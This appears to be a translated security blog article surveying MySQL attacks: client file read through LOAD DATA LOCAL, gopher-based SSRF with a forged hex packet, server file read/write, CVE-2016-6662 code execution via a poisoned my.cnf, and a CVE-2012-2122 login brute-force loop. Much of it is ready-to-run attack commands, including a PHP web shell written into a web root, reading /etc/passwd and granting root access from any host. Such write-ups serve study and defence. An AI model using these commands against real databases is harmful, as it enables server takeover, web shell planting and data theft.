Uncovering MySQL Exploits: From File Reads to Remote Code Execution

0x01 Simple Introduction

MySQL is the most popular relational database management system, widely used in web applications.

It was developed by MySQL AB and now belongs to Oracle. MySQL stores data in separate tables, which improves speed and flexibility.

0x02 Basic Commands

In normal usage and during attacks, the following commands are most frequently used.

0x1 Create

create database hehe; // create database

CREATE TABLE IF NOT EXISTS `runoob_tbl`(
   `runoob_id` INT UNSIGNED AUTO_INCREMENT,
   `runoob_title` VARCHAR(100) NOT NULL,
   `runoob_author` VARCHAR(40) NOT NULL,
   `submission_date` DATE,
   PRIMARY KEY (`runoob_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8; // create table

0x2 View

show databases;
show tables;
show variables like '%secure%'; // view security variables

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '
'; // read client file

0x3 Add Users and Privileges

CREATE USER 'username'@'host' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
DROP USER 'username'@'host';
flush privileges;

0x4 File Read/Write

SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
SELECT group_concat(id) FROM test INTO DUMPFILE "/var/lib/mysql-files/aaaa";

0x03 Attack Surface Analysis

0x1 MySQL client arbitrary file read

Applicable to all MySQL/MariaDB client versions. Condition: client started with –enable-local-infile.

The client can read arbitrary local files when the option is enabled, as shown in the following handshake diagram.

Key steps include:

Client sends SYN to server (port 3306).

Server replies with greeting packet containing version, protocol, salt, and capability flags.

Client sends authentication packet (username, password, capability flags).

Server validates credentials and sends OK packet.

Client issues normal queries.

Client sends LOAD DATA LOCAL command to read a local file.

Server responds with a filename packet, delivering the file content if the option is enabled.

0x2 SSRF attack against MySQL

Applicable to all MySQL/MariaDB server versions. Condition: existence of a user with an empty password.

By forging MySQL packets via the gopher protocol, an attacker can retrieve data from the server. The process consists of three parts: login authentication packets, client request packets, and server response packets (based on MySQL 5.1.73).

data = "b500000185a2bf01000000012d0000000000000000000000000000000000000000000000726f6f74000063616368696e675f736861325f70617373776f72640078035f6f73086f737831302e3134095f706c6174666f726d067838365f36340f5f636c69656e745f76657273696f6e06382e302e31380c5f636c69656e745f6e616d65086c69626d7973716c045f706964053432343831076f735f757365720634637431306e0c70726f6772616d5f6e616d65056d7973716c00000003210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310d0000000373656c656374206e6f772829"
print data.decode("hex")

Modifying the command portion of the packet allows execution of arbitrary SQL commands.

0x3 MySQL server file read/write

Applicable to all MySQL/MariaDB client versions. Condition: server configured with readable/writable directory and proper user permissions.

The secure_file_priv variable restricts LOAD DATA, SELECT … OUTFILE, DUMPFILE and LOAD_FILE() to a specific directory. Its possible values are:

NULL – import/export disabled.

A directory path (e.g., /tmp/) – operations limited to that directory.

Empty – no restriction.

Example commands:

show variables like '%secure%';
SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test;
CREATE TABLE test (id TEXT, content TEXT);
load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '
\r';
select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaa";

0x4 MySQL remote code execution / privilege escalation (CVE‑2016‑6662)

Versions: MySQL ≤5.7.14, ≤5.6.32, ≤5.5.51 and related MariaDB/PerconaDB branches.

Exploitation requires a user with FILE and SELECT privileges and the ability to write to the general log. By writing a malicious my.cnf that sets malloc_lib to a malicious shared library, the attacker can achieve root‑level code execution on server restart.

set global general_log_file = '/usr/local/mysql/data/my.cnf';
set global general_log = on;
select '
> 
> ; injected config entry
> 
> [mysqld]
> malloc_lib=/tmp/exploit.so
> 
> [separator]
> 
> ';
set global general_log = off;

0x5 MySQL authentication bypass (CVE‑2012‑2122)

Affected MariaDB versions: 5.1.62, 5.2.12, 5.3.6, 5.5.23. Affected MySQL versions: 5.1.63, 5.5.24, 5.6.6.

The password comparison bug allows login with any password when the username is known. A simple brute‑force loop can obtain access:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

0x04 Summary

The article summarizes MySQL client arbitrary file read, SSRF‑based data extraction, SQL injection file read/write, specific‑version remote code execution (CVE‑2016‑6662), and an old authentication bypass (CVE‑2012‑2122). Future work will analyze similar attacks on PostgreSQL.

0x05 References

http://www.nsoad.com/Article/Vulnerabilityanalysis/20160913/391.htm

https://www.freebuf.com/articles/web/159342.html

https://www.anquanke.com/post/id/84553

https://www.imooc.com/article/258850?block_id=tuijian_wz

https://blog.csdn.net/weixin_34255793/article/details/90309996